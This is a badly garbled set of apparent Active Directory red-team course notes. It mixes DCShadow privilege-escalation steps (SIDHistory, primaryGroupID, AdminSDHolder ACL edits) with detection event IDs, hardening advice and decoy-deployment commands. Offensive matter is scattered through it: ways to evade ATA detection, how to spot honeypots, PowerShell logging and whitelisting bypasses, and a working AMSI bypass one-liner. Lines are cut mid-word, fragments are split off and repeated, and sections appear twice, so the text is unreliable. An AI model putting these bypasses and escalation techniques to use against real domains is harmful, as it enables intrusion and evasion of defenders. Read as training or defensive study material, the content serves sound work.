ontainer, SPNs of an existing computer object and couple of RPC services.
ller", there are no directory change logs on the actual DC for the target object.

rt of the root domain.

d specify attributes to be modified :

ription /value:"Hello from DCShadow"

e values :

Description Privileges
start RPC service and specify attributes to be modified SYSTEM privs

Push the attribute's values DA or higher privs

Push the attribute's values DA or higher privs
ying ACLs of :

pology)

ainer

ng the permissions.
er object from machine mcorp-student1: (this should be executed as DA)
ccountName root1user -Username student1 -Verbose

required.
n instance 1.
run DCShadow (no need of DA privs)

eresting stuff can be done.

r Domain Admins group :
ory /value:S-1-5-21-560323961-2032768757-2425134131-519

sh) , the student1 user runs with the privs of Enterprise Admins (SID-519)

MAccountName root1user -Username student1 -Verbose

ryGroupID of a user account to Enterprise Admins or Domain Admins Group:

GroupID /value:519

up as a member of the Enterprise Admins group in some enumeration techniques like net group "Enterprise Admins" /domain

g DCShadow, as well.
add FullControl for a user
y("LDAP://CN=AdminSDHolder, CN=System, DC=moneycorp, DC=local")).psbase.ObjectSecurity.sddl
ve for SY/BA/DA with our user's SID at the end
=System, DC=moneycorp, DC=local /attribute:ntSecurityDescriptor /value:<modified ACL>
=System, DC=moneycorp, DC=local /attribute:ntSecurityDescriptor /value:<modified ACL>
dowception ):

//DC=moneycorp, DC=local")).psbase.ObjectSecurity.sddl

e following ACEs :

D)

ttributes)

ed the permissions with the user whose SID we added, we can modify the attributes of the specific user whose permissions we modified.
mcorp-student13 machine as studentl3 using DCShadow.
Information Obtained / Comments
We are using mimikatz.exe instead of invoke-
mimikatz, because the script does not show proper
output for DCShadow
ques like net group "Enterprise Admins" /domain

se.ObjectSecurity.sddl

odified ACL>
odified ACL>
ibutes of the specific user whose permissions we modified.
Detection and Defense
- Look for flow of credentials and privileges in your environment
- Log events & most importantly, monitor logs
- Purple Teaming
- Work culture & Architectural changes

Detection and Defense - Domain Admins

- Do not allow or limit login of DAs to any other machine other than the DCs. If logins to some servers is necessary, do not allo
- (Try to) Never run a service with DA. Many credential theft protections (like, credential guard, protected users groups, etc...
- Check out the Temporary Group Membership! (Requires Privileged Access management feature to be enabled which can't b
Add-ADGroupMember -Identity 'Domain Admins' -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)

Detection and Defense - Golden Ticket

- Some important event IDs :
4624 - Account Logon
4634 - Account Logoff
4672 - Admin Logon

- PowerShell command to filter out logs:

Get-WinEvent -FilterHashtable @{Logname='Security' ; ID = 4672} -MaxEvents 1 | Format-List -Property *

Detection and Defense - Silver Ticket

- Some important event IDs :
4624 - Account Logon
4634 - Account Logoff
4672 - Admin Logon

- PowerShell command to filter out logs:

Get-WinEvent -FilterHashtable @{Logname='Security' ; ID = 4672} -MaxEvents 1 | Format-List -Property *

Detection and Defense - Skeleton Key

• Events — System Event ID 7045 - A service was installed in the system. (Type Kernel Mode driver)
• Events ("Audit privilege use" must be enabled)
— Security Event ID 4673 - Sensitive Privilege Use
— Event ID 4611 — A trusted logon process has been registered with the Local Security Authority

Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*"}

• Not recommended (detects only stock mimidrv):

Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*" -and $_.message

Mitigations:
- Running lsass.exe as a protected process is really handy as it forces an attacker to load a kernel mode driver.
- Make sure that you test it thoroughly as many drivers and plugins may not load with the protection.
New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\LSA\ -Name RunAsPPL -Value 1 -Verbose
Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*"}

• Not recommended (detects only stock mimidrv):

Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*" -and $_.message

Mitigations:
- Running lsass.exe as a protected process is really handy as it forces an attacker to load a kernel mode driver.
- Make sure that you test it thoroughly as many drivers and plugins may not load with the protection.
New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\LSA\ -Name RunAsPPL -Value 1 -Verbose

verify after reboot:

Get-WinEvent -FilterHashtable @{Logname='System';ID=12} | ?{$_.message -like "*protected process*"}

Detection and Defense - DSRM

- Some important event IDs :
Event ID 4657 - Audit creation (or) change of HKLM:\System\CurrentControlSet\Control\Lsa\ DsrmAdminLogonBehaviour

Detection and Defense - Malicious SSP

- Some important event IDs :
Event ID 4657 - Audit creation (or) change of HKLM:\System\CurrentControlSet\Control\Lsa\ SecurityPackages

Detection and Defense - Kerberoast

- Some important event IDs :
Security Event ID 4769 - A Kerberos ticket was requested
- Since 4769 is logged very frequently on a DC, we may like to filter results based on the following information from logs:
* Service name should not be krbtgt
* Service name does not end with $ (to filter out machine accounts used for services)
* Account name should not be machine@domain (to filter out requests from machines)
* Failure code is '0x0' (to filter out failures, 0x0 is success)
* Most importantly, ticket encryption type is 0x17

Mitigations:
* Service account passwords should be hard to guess (greater than 25 characters)
* Use managed service accounts (automatic change of passwords periodically and delegated SPN management)

PowerShell one-liner for quick testing:

Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -
'*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select - ExpandProperty message

Detection and Defense - Delegation

- Limit DA/Admin Logins to specific servers
- Set "Account is sensitive and cannot be delegated" for privileged accounts

Detection and Defense - ACL attacks

• Events
Security Event ID 4662 (Audit Policy for object must be enabled) — An operation was performed on an object
Security Event ID 5136 (Audit Policy for object must be enabled) — A directory service object was modified
Security Event ID 4670 (Audit Policy for object must be enabled) — Permissions on an object were changed

• Useful tool AD ACL Scanner - Create and compare create reports of ACLs. https://github.com/canix1/ADACLScanner
Detection and Defense - ACL attacks
• Events
Security Event ID 4662 (Audit Policy for object must be enabled) — An operation was performed on an object
Security Event ID 5136 (Audit Policy for object must be enabled) — A directory service object was modified
Security Event ID 4670 (Audit Policy for object must be enabled) — Permissions on an object were changed

• Useful tool AD ACL Scanner - Create and compare create reports of ACLs. https://github.com/canix1/ADACLScanner

Detection and Defense - Trust tickets

SID Filtering
- Avoid attacks that abuse SID history attribute across forest trust.
- Enabled by default on all inter-forest trusts. Intra-forest trusts are assumed secured by default (MS considers forest and not
- But, since SID filtering has the potential to break applications and user access, it is often disabled.

Selective Authentication
• In an inter-forest trust, if Selective Authentication is configured, users between the trusts will not be automatically authentic
• Individual access to domains and servers in the trusting domain/forest should be given.
vers is necessary, do not allow other administrators to login to that machine.
otected users groups, etc...) which we'll discuss below are rendered useless incase of a service account.
to be enabled which can't be turned off later)
ew-TimeSpan -Minutes 20)

perty *

perty *

rity

de Driver*"}

e Driver*" -and $_.message -like "*mimidrv*"}

mode driver.
tion.
rbose
de Driver*"}

e Driver*" -and $_.message -like "*mimidrv*"}

mode driver.
tion.
rbose

ess*"}

DsrmAdminLogonBehaviour

ecurityPackages

information from logs:

PN management)

e.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("

n an object
modified
changed

ix1/ADACLScanner
n an object
modified
changed

ix1/ADACLScanner

MS considers forest and not the domain to be a security boundary).

d.

t be automatically authenticated.
@*' -and $_.Message.split("`n")[18] -like
Detection and Defense - ATA
- Microsoft ATA (Advanced Threat Analytics)
- Traffic destined for Domain Controller(s) is mirrored to ATA sensors and a user activity profile is built over time - use of com
- Collects events 4776 (The DC attempted to validate the credentials for an account) to detect credential replay attacks.
- Can detect behavior anomalies
- Useful for detecting:
* Recon : Account enum, Netsession enum
* Compromised credential attacks : Brute force, high privilege account/service account exposed in clear text , honey token
* Credential / hash / ticket replay attacks

- One thing about ATA is that, say for eg: we run Invoke-UserHunter, ATA does not complaint about the list of computers and
on the Domain Controllers.
- So, what we can do is, first use Get-NetComputer, remove the DCs from that list and pass that new list as a parameter to In
Invoke-UserHunter -ComputerFile <listofmachines>

- Similarly, while doing PTH using mimikatz, to avoid detection from ATA, we can use the AES keys along with the ntlm hash t
- Same applies to Golden tickets as well.
- ATA detects DCSync, does not detect DCShadow
- ATA doesn not detect Silver Tickets

The key to bypassing ATA is to avoid talking to the DC as long as possible and make appear the traffic we generate as attacker
is built over time - use of computers, credentials, logon machines, etc.
credential replay attacks.

osed in clear text , honey tokens, unusual protocol (NTLM Kerberos)

about the list of computers and group memberships we request/enumerate from the DC. It only complains that a session enumeration wa

t new list as a parameter to Invoke-UserHunter

eys along with the ntlm hash to avoid detcetion on ATA.

raffic we generate as attacker normal.

hat a session enumeration was performed
LAPS ( Local Administrator Password Solution)
- Centralized storage of passwords in AD with periodic randomizing where read permissions are access controlled.
- When LAPS is used, Computer objects have two new attributes:
* ms-mcs-AdmPwd (stores the clear text password)
* ms-mcs-AdmPwdExpirationTime (controls the password change)
- Storage in clear text, transmission is encrypted.
- With careful enumeration, it is possible to retrieve which users can access the clear text password providing us a list of attra

Credential Guard
- Now called Windows Defender Credential Guard, it "uses virtualization based security to isolate secrets(say lsass), so that o
- Effective in stopping PTH and over-PTH attacks by restricting access to NTLM hashes and TGTs. As of Windows 10 1709, it is
- But, credentials for local accounts in SAM and service account credentials from LSA secrets are NOT protected by Credentia
- Credential Guard cannot be enabled on a domain controller as it breaks authentication there.
- Only available on the windows 10 enterprise edition and server 2016.
- It has been proved possible to replay service account credentials for lateral movement even if credential guard is enabled.

Device Guard
- Now called, Windows Defender Device Guard, it is a group of features "designed to harden a system against malware attack
- Three primary components :
* Configurable Code Integrity (CCI) - configure only trusted code to run
* Virtual secure mode protected code Integrity - Enforces CCI with Kernel mode (KMCI) and User mode (UMCI)
* Platform and UEFI Secure Boot - Ensures boot binaries and firmware integrity
- UMCI code integrity means to allow only known good code to run
- UMCI is something that interferes with most of the lateral movement attacks we have seen.
- While it depends on the deployment, many well known application whitelisting bypasses - signed binaries like csc.exe, MSB

Protected Users Group

* Protected Users is a group introduced in Server 2012 R2 for "better protection against credential theft" by not caching crede
A user added to this group:
— Cannot use CredSSP and WDigest - No more cleartext credentials caching.
— NTLM hash is not cached.
— Kerberos does not use DES or RC4 keys. No caching of clear text cred or long term keys.

* If the domain functional level is Server 2012 R2:

— No NTLM authentication.
— No DES or RC4 keys in Kerberos pre-auth.
— No delegation (constrained or unconstrained)
— No renewal of TGT beyond initial four hour lifetime - Hardcoded, unconfigurable "Maximum lifetime for user ticket" and

Protected Users Group :

 — Kerberos does not use DES or RC4 keys. No caching of clear text cred or long term keys.

* If the domain functional level is Server 2012 R2:

— No NTLM authentication.
— No DES or RC4 keys in Kerberos pre-auth.
— No delegation (constrained or unconstrained)
— No renewal of TGT beyond initial four hour lifetime - Hardcoded, unconfigurable "Maximum lifetime for user ticket" and

Protected Users Group :

- Needs all domain controllers to be atleast server 2008 or later (because AES keys)
- Not recommeded by Microsoft to add all DAs and EAs to this group without testing "the potential impact" of lockout.
- No cached logon (an issue for mobile users)
- Again, having computer and service accounts in this group is useless as their credentials will always be present on the host m

Privileged Administrative Workstations (PAWs)

* A hardened workstation for performing sensitive tasks like

administration of domain controllers, cloud infrastructure, sensitive
business functions etc.

* Can provide protection from phishing attacks, OS vulnerabilities,

credential replay attacks.

* Admin Jump servers to be accessed only from a PAW, multiple strategies

— Separate privilege and hardware for administrative and normal tasks.

— Having a VM on a PAW for user tasks.

Active Directory Administrative Tier Model

* Composed of three levels only for administrative accounts:

— Tier 0- Accounts, Groups and computers which have privileges across the enterprise like domain controllers,
domain admins, enterprise admins. .

— Tier 1- Accounts, Groups and computers which have access to resources having significant amount of business
value. A common example role is server administrators who maintain these operating systems with the ability to
impact all enterprise services.

— Tier 2 - Administrator accounts which have administrative control of a significant amount of business value that is
hosted on user workstations and devices. Examples include Help Desk and computer support administrators
because they can impact the integrity of almost any user data.

* Control Restrictions - What admins control.

* Logon Restrictions - Where admins logon to.
 Control Restrictions

ESAE (Enhanced Security Admin Environment) - THE RED FOREST

Dedicated administrative forest for managing critical assets like

administrative users, groups and computers.

Since a forest is considered a security boundary rather than a domain,

this model provides enhanced security controls.

The administrative forest is also called the Red Forest.

Administrative users in a production forest are used as standard non-

privileged users in the administrative forest.

Selective Authentication to the Red Forest enables stricter security

controls on logon of users from non-administrative forests.
e access controlled.

word providing us a list of attractive targets!

te secrets(say lsass), so that only privileged system software can access them"
. As of Windows 10 1709, it is not possible to write kerberos tickets to memory even if we have credentials.
e NOT protected by Credential Guard.

credential guard is enabled.

system against malware attacks. It's focus is preventing malicious code from running by ensuring only known good code can run"

User mode (UMCI)

ned binaries like csc.exe, MSBuild.exe etc. - are useful for bypassing UMCI as well.

tial theft" by not caching credentials in insecure ways.

m lifetime for user ticket" and "Maximum lifetime for user ticket renewal"
m lifetime for user ticket" and "Maximum lifetime for user ticket renewal"

ntial impact" of lockout.

lways be present on the host machine.

ain controllers,

mount of business
with the ability to

business value that is

ministrators
Logon Restrictions
n good code can run"
 Deception in AD - Decoy
Deception
- Deception is a very effective technnique in Active Directory defense.
- By using decoy domain objects, defenders can trick adversaries into following a particular attack path which increases chanc
- Traditionally, deception has been limited to leave honey credentials on some boxes and check their usage but we can use it
- What to target? Adversary mindset of going for the lowest-hanging fruit and illusive superiority over defenders.
- We must provide the adversaries what they are looking for. For example, what adversaries look for in a user object:
* Password does not expire
* Trusted for delegation
* Users with SPN
* Password in Description
* Users who are members of high privilege groups
* Users with ACL rights over other users, groups or containers

Let's create some objects which can be used for deceiving adversaries. We can use Deploy-Deception for this: https://github.
Note:
We should turn on Audit for Directory service access using Group Policy in order to use deploy-deception in our AD environme
Windows Settings -> Security settings -> Advanced Audit policy configuration -> DS access - audit directory service access

Tool Command
Deploy-Deception Create-DecoyUser -UserFirstName user -
UserLastName manager -Password Pass@123 |
Deploy-UserDeception -UserFlag
PasswordNeverExpires -Verbose

Now, after we have deployed the decoy user in the domain, if any kind of user enumeration is done on the domain, it leaves a
Now, after we have deployed the decoy user in the domain, if any kind of user enumeration is done on the domain, it leaves a

- A GenericRead or ReadProperty triggers a 4662 in all cases even when the decoy user is not specifically enumerated.
For eg, following commands trigger a 4662 for decoy user called "usermanager" :
- net user /domain
- Get-WmiObject -Class win32_UserAccount
- Get-ADUser -Filter * (ActiveDirectory Module)
- Get-NetUser (PowerView and other LDAP based tools)
- Find users, contacts and Groups - GUI

Hence, we need a way to trigger log only when absolutely necessary. One way to do it is by triggering logs only when an uncom

- So, a better use case is to get a log entry only when an obscure/uncommon property is read.
Let's create a decoy user "usermanager-uncommon" whose password never expires and turn on auditing when x500uniqueId

Tool Command
Deploy-Deception Create-DecoyUser -UserFirstName user -
UserLastName manager-uncommon -Password
Pass@123 | Deploy-UserDeception -UserFlag
PasswordNeverExpires -GUID d07da11f-8a3d-42b6-
b0aa-76c962be719a -Verbose

- For the previous decoy user, only LDAP based tools like PowerView, ADExplorer etc. trigger 4662
- Tools which use LDAP or other offensive tools fetch all the information in a single attempt which make them stand out.
- Since we are targeting very basic enumeration, which means there is a lot of noise, this is useful for filtering out some of the
- Results are quite similar for user SPN (You may like to use a Kerberoastable password when targeting lateral movement) :
Create-DecoyUser -UserFirstName user -UserLastName manager-spn -Password Pass@123 | Deploy-UserDeception -SPN 'dc

This way, we can lead the adversary to kerberoast the user and crack the password. And, once they use the password for later

Tool Command
Deploy-Deception Create-DecoyUser -UserFirstName user -
UserLastName manager-uncommon -Password
Pass@123 | Deploy-UserDeception -UserFlag
PasswordNeverExpires -GUID d07da11f-8a3d-42b6-
b0aa-76c962be719a -Verbose

Deception in AD - Decoy co
- Just like decoy users, Blue teamers can deploy decoy computer objects as well.
- It is better to use actual computers as decoys to avoid easy identification. Decoy computers should either be VMs or turned
- What computers are the attackers interested in?
* Older Operating Systems
* Interesting SPN
* Delehgation Settings
* Membership of Privileged Groups

Tool Command
Deploy-Deception Create-DecoyComputer -ComputerName dcorp-web -
Verbose | Deploy-ComputerDeception -PropertyFlag
TrustedForDelegation -GUID d07da11f-8a3d-42b6-
boaa-76c962be719a -Verbose

Deploy-Deception Deploy-ComputerDeception -DecoyComputerName

comp1 -PropertyFlag TrustedForDelegation -Right
ReadControl -Verbose
We can also use this (with limited success) for DCShadow to mimic a Domain Controller

Deception in AD - Decoy G
- Just like decoy users and decoy computers, Blue teamers can deploy decoy groups as well.
- Groups are interesting to attackers. We can have decoy groups with logging enabled for interesting activity like when Group
x500UniqueIdentifier or the DACL is read.
- We can make a Group, a member of other interesting groups.
- We can also create decoy users and make them member of the decoy group we are creating.

Tool Command
Deploy-Deception Create-DecoyGroup -GroupName "Forest Admins" -
Verbose | Deploy-GroupDeception -AddMembers
usermanager -AddToGroup dnsadmins -Right
ReadControl -Verbose

Deploy-Deception Create-DecoyGroup -GroupName "Forest Admins" -

Verbose | Deploy-GroupDeception -AddMembers
usermanager -AddToGroup dnsadmins -GUID
bc0ac240-79a9-11d0-9020-00c04fc2d4cf -Verbose

Deception in AD - Lateral Move

- Couple of very interesting techniques which are also usable with the popular honey-credentials method. Make the decoy us
* Set the logon workstation to a non-existent machine.
* Deny logon to the user.
- In both the above cases, even with valid credentials, an adversary cannot abuse the credentials.
- With Audit Kerberos Authentication Service with Audit Failure enabled, a 4768 is logged every time someone tries to use th
- Such a decoy user will also be very interesting for enumeration!

Note:
To enable Audit Kerberos Authentication Service:
Configuration > Windows settings > security settings > advanced audit policy configuration > audit policies > account logon > A

Tool Command
Deploy-Deception Create-DecoyUser -UserFirstName dec -UserLastName
da -Password Pass@123 | Deploy-
PrivilegedUserDeception -Technique
DomainAdminsMembership -Protection DenyLogon -
Verbose

Deploy-Deception Deploy-UserDeception -DecoySamAccountName

decda -GUID d07da11f-8a3d-42b6-boaa-
76c962be719a -Verbose

- Another interesting technique is to provide a "master" user FullControl over a "slave" user. This makes both the master and
- Like the previous one, this technique is also useful in both the enumeration - specifically ACL enumeration and lateral move
- For targeting lateral movement, we can make either slave or master or both privileged users, set SPN or any other flag we s

Tool Command
Deploy-Deception Create-DecoyUser -UserFirstName master -
UserLastName user -Password Pass@123

Create-DecoyUser -UserFirstName slave -

UserLastName user -Password Pass@123 | Deploy-
SlaveDeception -DecoySamAccountName masteruser
-Verbose

Deploy-Deception Deploy-UserDeception -DecoySamAccountName

slaveuser -Principal masteruser -Right WriteDacl -
Verbose
Deploy-Deception Deploy-UserDeception -DecoySamAccountName
slaveuser -Principal honeyuser -Right ReadProperty -
Verbose

Red Teaming Revenge - Identifying Deception

- There are multiple Enterprise solutions which do not use actual objects and can be spotted by looking at object properties li
* objectSID - (objectSID would be different from SID of the domain)
* lastLogon, lastlogontimestamp
* Logoncount
* whenCreated
* Badpwdcount
* Compare with known actual objects.

Red Teaming Revenge - Identifying Deception

• Some Enterprise solutions also fill up ALL possible attributes for an object which can be easily spotted by comparing attribute

• In an assume breach scenario or from a foothold box, you can always get the actual DC by looking at logonserver env variab
computers. Compare SID of other users with RID 500 and other built-in accounts.

• For multiple solutions, using WMI for retrieving information lists only the actual objects and not the fake ones.

Red Teaming Revenge - Avoiding Deception

• Red Teams need to change their approach to avoid detection by deception.

• please stop going for the lowest hanging fruit. Enterprise networks are a mess, but if something looks too good to be true, in

• Avoid automated enumeration tools unless you absolutely know what they are doing in the background.

• Avoid the urge to go for DA privs so that you can brag about it in the reports! Focus on the goal of your operation.
A tool which does a fantastic job at identifying fake domain admins is Invoke-HoneypotBuster

Tool Command
Invoke- Invoke-HoneypotBuster -OpSec
HoneypotBuster

Deploy-Deception addresses this to a limited extent by starting (and stopping) a process as the decoy DA when LogonWorksta
This fills up the "suspicious" properties.

Create-DecoyUser -UserFirstName dec -UserLastName da -Password Pass@123 | Deploy-PrivilegedUserDeception -Techniqu

CreateLogon -LogonCount 6 -Verbose
(Here, 6 is very tool specific to Invoke-HoneypotBuster)

Please be warned that the CreateLogon option in the above command will also create a profile for the decoy DA on the DC.
 Deception in AD - Decoy users
ense.
into following a particular attack path which increases chances of detection and increase their cost in terms of time.
ntials on some boxes and check their usage but we can use it effectively during other phases of an attack.
ging fruit and illusive superiority over defenders.
r example, what adversaries look for in a user object:

aries. We can use Deploy-Deception for this: https://github.com/samratashok/Deploy-Deception

Policy in order to use deploy-deception in our AD environment:

nfiguration -> DS access - audit directory service access

Description Privileges
create a decoy user "usermanager" whose password Domain Admin
never expires and turn on GenericRead for
"Everyone"

y kind of user enumeration is done on the domain, it leaves a 4662 code in the logs
y kind of user enumeration is done on the domain, it leaves a 4662 code in the logs

n when the decoy user is not specifically enumerated.

usermanager" :

ary. One way to do it is by triggering logs only when an uncommon property is enumerated.

/uncommon property is read.

sword never expires and turn on auditing when x500uniqueIdentifier is read for "Everyone"

Description Privileges
Alerting the logs for a 4662 only when all the Domain Admin
properties are read, thus filtering out the noise of
unwanted 4662 logs.

View, ADExplorer etc. trigger 4662

rmation in a single attempt which make them stand out.
here is a lot of noise, this is useful for filtering out some of the noise.
rberoastable password when targeting lateral movement) :
-spn -Password Pass@123 | Deploy-UserDeception -SPN 'dc/MSSQLSvc' -GUID f3a64788-5306-11d1-a9c5-0000f80367c1 -Verbose

ack the password. And, once they use the password for lateral movement, there will be a log entry.

Description Privileges
 create a decoy user "usermanage-uncommon" and Domain Admin
configuring settings to log alerts only when a
particular (or) all the properties are enumerated.

Deception in AD - Decoy computers

objects as well.
ntification. Decoy computers should either be VMs or turned off after joining the domain unless they are used as honeypots.

Description Privileges
Create a computer object for auditing whenever Domain Admin
x500UniqueIdentifier is read

Modify a computer object for auditing whenever it's Domain Admin

DACL is read.

c a Domain Controller

Deception in AD - Decoy Groups

eploy decoy groups as well.
with logging enabled for interesting activity like when Group Membership is read or Group members are read or an obscure property like

e decoy group we are creating.

Description Privileges
 Auditing when the DecoyGroup DACL is read Domain Admin

Logs 4662 when Group membership property set is Domain Admin

read

Deception in AD - Lateral Movement - Users

h the popular honey-credentials method. Make the decoy user a part of the domain admins or other privileged group or have rights like D

ary cannot abuse the credentials.

enabled, a 4768 is logged every time someone tries to use that user.
!

audit policy configuration > audit policies > account logon > Audit Kerberos Authentication Service > success

Description Privileges
create a decoy user "decda" who is a member of the Domain Admin
domain admins group and is denied logon.

Enable directory access (4662) auditing on user

"decda"

llControl over a "slave" user. This makes both the master and slave users interesting for an adversary looking at ACLs.
enumeration - specifically ACL enumeration and lateral movement phase.
aster or both privileged users, set SPN or any other flag we saw in Deploy-UserDeception.

Description Privileges
 create a slave user and set FullControl over it for a Domain Admin
master user for targeting enumeration.

To target lateral movement, as an example, we can Domain Admin

set auditing whenever master user changes the ACL of
slave user
To target lateral movement, for any existing Domain Admin
"honeyuser", set auditing whenever honeyuser is used
to interact with the slaveuser

l objects and can be spotted by looking at object properties like :

main)

an object which can be easily spotted by comparing attributes with a real computer, say, the domain controller.

lways get the actual DC by looking at logonserver env variable. Use the DC or your own computer object's properties to compare properti
built-in accounts.

s only the actual objects and not the fake ones.

y deception.

rks are a mess, but if something looks too good to be true, investigate carefully!

w what they are doing in the background.

n the reports! Focus on the goal of your operation.

ns is Invoke-HoneypotBuster

Description Privileges

nd stopping) a process as the decoy DA when LogonWorkstation is set to one of the DCs.

word Pass@123 | Deploy-PrivilegedUserDeception -Technique DomainAdminsMembership -Protection LogonWorkStation -LogonWorkS

mand will also create a profile for the decoy DA on the DC.
and increase their cost in terms of time.
g other phases of an attack.

k/Deploy-Deception

Information Obtained / Comments

Please remember that an actual user is created on the DC where
the above command is executed. Please remember to document
this user's creation.

After running this command, there should be a 4662 in the log

events.

Incase, it is not being logged, in the server manager of the DC, go

to Local group policy editor -> computer configuration ->
Windows Settings -> Security settings -> Advanced Audit policy
configuration -> DS access - audit directory service access ->
configure -> success -> apply -> OK

e logs
e logs

s enumerated.

or "Everyone"

Information Obtained / Comments

Here, GUID for x500uniqueIdentifier is d07da11f-8a3d-42b6-
b0aa-76c962be719a

UID f3a64788-5306-11d1-a9c5-0000f80367c1 -Verbose

ere will be a log entry.

Information Obtained / Comments

 Here, GUID for x500uniqueIdentifier is d07da11f-8a3d-42b6-
b0aa-76c962be719a

the domain unless they are used as honeypots.

Information Obtained / Comments

read or Group members are read or an obscure property like

Information Obtained / Comments

ers
domain admins or other privileged group or have rights like DCSync :

thentication Service > success

Information Obtained / Comments

resting for an adversary looking at ACLs.

erDeception.

Information Obtained / Comments

mputer, say, the domain controller.

your own computer object's properties to compare properties of other

ly!
 Information Obtained / Comments

of the DCs.

nsMembership -Protection LogonWorkStation -LogonWorkStation dcorp-dc -

Detection and Defense - PowerShell
- Upgrade to Windows PowerShell 5.1 (Do not install PowerShell 6.0.0, it is PowerShell core and does not support many secu
- Windows PowerShell 5 offers multiple security controls which certainly increase the costs to attacker.

1. WhiteListing
- Use application control policies (Applocker) and Device Guard to restrict PowerShell scripts. If Applocker is configured in "Al
- In the constrained language mode, all windows cmdlets and elements are allowed but allows only limited types.
For eg: Add-Type,Win32APIs, COM objects are not allowed.
- Both are supported by GPO, your mileage may vary according to your implementation preferences.

WhiteListing Bypasses
Please be mindful of whitelisting implementation. For eg, if powershell.exe is blocked , .NET code can use System.Managemen
C:\Windows\Microsoft.NET\Framework\v4.0.30319 > msbuild.exe pshell.xml

2. Enhanced Logging
- PS v5 supports Enhanced Logging - script block logging and system-wide transcription.
- This allows Blue Teams to have a very in-depth look of an attacker's actvities if he is using PowerShell.

A. System-wide Transcription
- Enables transcription (console logging) for everything (powershell.exe, PowerShell ISE, custom hosts - .NET DLL, msbuild, ins
- Can be enabled using Group Policy (Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on P
- By default, the transcripts are saved in the user's "My Documents" directory.
- HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription is the Registry key. Set enable transcripting to 1.

Cons of System-wide Transcription

- The transcripts are written as text files and can quickly grow in size because the command output is also recorded. It is alwa
running out of disk space.
- Enabling transcripts on a DC breaks the Active Directory Administration Centre (ADAC) GUI Application.

B. Script block logging

- Logs contents of all the script blocks processed by the PowerShell engine regardless of host used.
- Can be enabled using Group Policy (Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on P
- Logs to Microsoft-Windows-PowerShell/Operational
- By-default, only first execution of a script block is logged (verbose 4104). Set "Log script block invocation start / stop events
- HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging is the Registry key. Set EnableScriptBlockLogg
- PS v5 onwards logs some suspicious script blocks automatically based on a list of suspicious commands.
- It also records the original obfuscated code as well as decoded and deobfuscated code.

Cons of Script Block logging

- Warning level script block logging checks only for a known list of suspicious commands.
- Large no. of logs for script block logging. Even more if invocation of script blocks is logged.
- Huge number of logs when module logging is enabled.
3. AMSI
- AMSI (Anti Malware Scan Interface) provides the registered antivirus access to contents of a script before execution.
- This allows detection of malicious scripts regardless of input method (disk, encodedcommand, in-memory)
- Enabled by default on windows 10 and supported by windows defender.
- Known problem : AMSI has no detection mechanism. It is dependent on the signature based detection by the registered anti
4. Constrained PowerShell
- Language mode in PowerShell is used to control access to different elements of a powershell session
- In constrained language mode, all windows cmdlets and elements are allowed, but allows only limited types. For eg: Add-T
- Intended to work with Applocker in "Allow mode" or UMCI (Device Guard User mode Code Integrity)
"
4. Constrained PowerShell
- Language mode in PowerShell is used to control access to different elements of a powershell session
- In constrained language mode, all windows cmdlets and elements are allowed, but allows only limited types. For eg: Add-T
- Intended to work with Applocker in "Allow mode" or UMCI (Device Guard User mode Code Integrity)
- When allow mode is set for scripts in applocker, the constrained language mode kicks-in by itself.
- Known problem : Not easy to implement enterprise-wide.

5. JEA
- JEA (Just Enough Administration) provides role based access control for PowerShell based remote delegated administration
- With JEA, non-admin users can connect remotely to machines for doing specific tasks.
- Focused more on securing privileged access than solving a problem introduced with PowerShell
- JEA endpoints have PowerShell transcription and logging enabled.

Bypasses
- Bypasses for the defenses discussed above can be categorized in the following categories :
* PowerShell downgrade to version 2
* Unloading, disabling or unsubscribing
* Obfuscation
* Trust Abuse (using trusted executables and code injection in trusted scripts)
- Many bypasses leave log entries which can be used to detect them

1. Bypassing using PowerShell downgrade

- PS v2 lacks ALL of the detection mechanisms we discussed
- PS v2 can be called using the -Version parameter or by using v2 reference assemblies.
- Version v2.0, 3.0 or 3.5 of the .NET framework is required to use PS v2.
- PS v2 Windows features must be enabled (enabled by default)
- This bypass leaves a log event ID 400 (which can be used for detection)

2. Bypassing Script Block Logging

- Can be bypassed for the current session without admin rights by disabling it from the Group Policy Cache as discovered by R
- For efficiency, Group Policy settings are cached and used by PowerShell. It is possible to read and modify the settings.
- Taken from : https://cobbr.io/ScriptBlock-Logging-Bypass.html
- Can be bypassed for the current session without admin rights by disabling it from the Group Policy Cache as discovered by R
- For efficiency, Group Policy settings are cached and used by PowerShell. It is possible to read and modify the settings.
- Taken from : https://cobbr.io/ScriptBlock-Logging-Bypass.html

3. Bypassing AMSI
- AMSI can be bypassed for the current session without admin rights by setting the amsiInitFailed of System.Management.Au
- Tweeted by Matt Graber
https://twitter.com/mattifestation/status/735261176745988096

[Ref].Assembly.GetType('http://System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetV

4. Bypassing using Obfuscation

- Obfuscation defeats script block logging, warning level auto logging and AMSI when done right.
- As a very simple example, we have already seen how GetField becomes GetFiel`d to bypass warning level auto logging.
- Invoke-Obfuscation and Invoke-CradleCrafter from Daniel (https://github.com/danielbohannon) are very useful for impleme
 6.0.0, it is PowerShell core and does not support many security features of Windows PowerShell 5.1)
ertainly increase the costs to attacker.

o restrict PowerShell scripts. If Applocker is configured in "Allow mode" for scripts, PowerShell 5 automatically uses the Constrained Langu
ements are allowed but allows only limited types.

o your implementation preferences.

rshell.exe is blocked , .NET code can use System.Management.Automation NameSpace to load PowerShell functionality.
e pshell.xml

em-wide transcription.
ker's actvities if he is using PowerShell.

